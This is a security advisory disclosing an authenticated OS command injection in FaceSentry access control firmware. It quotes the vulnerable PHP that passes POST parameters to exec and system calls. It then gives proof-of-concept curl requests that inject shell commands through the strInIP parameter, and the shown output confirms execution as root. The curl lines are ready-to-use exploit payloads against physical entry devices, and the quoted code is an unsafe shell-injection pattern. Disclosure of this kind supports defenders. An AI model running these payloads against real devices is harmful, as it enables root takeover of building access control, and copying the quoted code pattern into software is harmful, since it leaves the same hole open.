FaceSentry Access Control System 6.4.8 Remote Command Injection
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: FaceSentry suffers from an authenticated OS command
injection vulnerability using default credentials. This can
be exploited to inject and execute arbitrary shell commands
as the root user via the 'strInIP' and 'strInPort' parameters
(POST) in pingTest and tcpPortTest PHP scripts.
8:if (!isAuth('TestTools','R')){
9:echo "No Permission";
10: include("footer.php");
11: exit;
14: if(isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
20: $strOperationResult = "";
21: if ($strInIP != ""){
23:$out = array();
24:exec("sudo ping -c 4 $strInIP",$out);
25:$result = "";
26:foreach($out as $line){
27:$result = $result.$line."<br>";
14: if (isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19: if (isset($_POST["strInPort"])){
20: $strInPort = $_POST["strInPort"];
21: }else{
22: $strInPort = "";
23: }
53: $strOperationResult = "";
54: if ($strInIP != "" and $strInPort != ""){
55: $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
56: system("date>>".TCP_PORT_TEST);
57: if (!$fp) {
58: $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
59: system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
60: } else {
61: fclose($fp);
62: $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
63: system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
64: }
65: }
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2019-5523
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
$ curl -X POST '' \
--data 'strInIP=`sudo id > garbage.txt`&strInPort=80' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
$ curl
uid=0(root) gid=0(root) groups=0(root)
$ curl -X POST '' \
--data 'strInIP=;sudo id' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
|grep uid
% Total% Received % XferdAverage Speed TimeTime TimeCurrent
DloadUpload Total SpentLeftSpeed
1007726076971002910180 38 --:--:-- --:--:-- --:--:-- 10181
<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">